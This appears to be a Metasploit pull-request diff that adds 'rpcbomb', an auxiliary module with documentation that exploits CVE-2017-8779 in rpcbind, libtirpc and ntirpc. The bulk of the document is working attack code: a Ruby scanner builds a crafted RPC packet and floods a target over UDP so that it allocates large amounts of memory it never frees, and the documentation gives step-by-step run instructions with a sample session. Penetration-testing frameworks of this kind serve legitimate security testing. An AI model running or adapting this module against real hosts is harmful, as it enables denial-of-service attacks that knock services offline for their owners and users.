Land rapid7#8515, Rpcbomb DoS Module

Author: pbarry-r7

data/markdown_doc/auxiliary_scanner_template.erb

@@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
 msf <%= mod.type %>(<%= mod.shortname %>) > exploit
 ```
 
-Other examples of setting the RHSOTS option:
+Other examples of setting the RHOSTS option:
 
 Example 1:
 

documentation/modules/auxiliary/dos/rpc/rpcbomb.md

@@ -0,0 +1,29 @@
+## Vulnerable Application
+
+This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
+LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
+
+Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/dos/rpc/rpcbomb`
+1. Do: `set RHOSTS [IP]`
+1. Do: `run`
+1. Target should leak memory
+
+## Scenarios
+
+### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
+
+```
+msf > use auxiliary/dos/rpc/rpcbomb 
+msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
+RHOSTS => 10.0.2.7
+msf auxiliary(rpcbomb) > run
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(rpcbomb) >
+```

modules/auxiliary/dos/rpc/rpcbomb.rb

@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Dos
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'RPC DoS targeting *nix rpcbind/libtirpc',
+      'Description' => %q{
+        This module exploits a vulnerability in certain versions of
+        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
+        large (and never freed) memory allocations for XDR strings on
+        the target.
+      },
+      'Author'  =>
+        [
+          'guidovranken', # original code
+          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
+        ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        [ 'CVE', '2017-8779' ],
+        [ 'BID', '98325' ],
+        [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
+      ],
+      'Disclosure Date' => 'May 03 2017'))
+
+    register_options([
+      Opt::RPORT(111),
+      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
+      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
+    ])
+  end
+
+  def scan_host(ip)
+    pkt = [
+      0,        # xid
+      0,        # message type CALL
+      2,        # RPC version 2
+      100000,   # Program
+      4,        # Program version
+      9,        # Procedure
+      0,        # Credentials AUTH_NULL
+      0,        # Credentials length 0
+      0,        # Credentials AUTH_NULL
+      0,        # Credentials length 0
+      0,        # Program: 0
+      0,        # Ver
+      4,        # Proc
+      4,        # Argument length
+      datastore['ALLOCSIZE'] # Payload
+    ].pack('N*')
+
+    s = udp_socket(ip, datastore['RPORT'])
+    count = 0
+    while count < datastore['COUNT'] do
+      begin
+        s.send(pkt, 0)
+      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
+        vprint_error("Host #{ip} unreachable")
+        break
+      end
+      count += 1
+    end
+
+    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
+  end
+end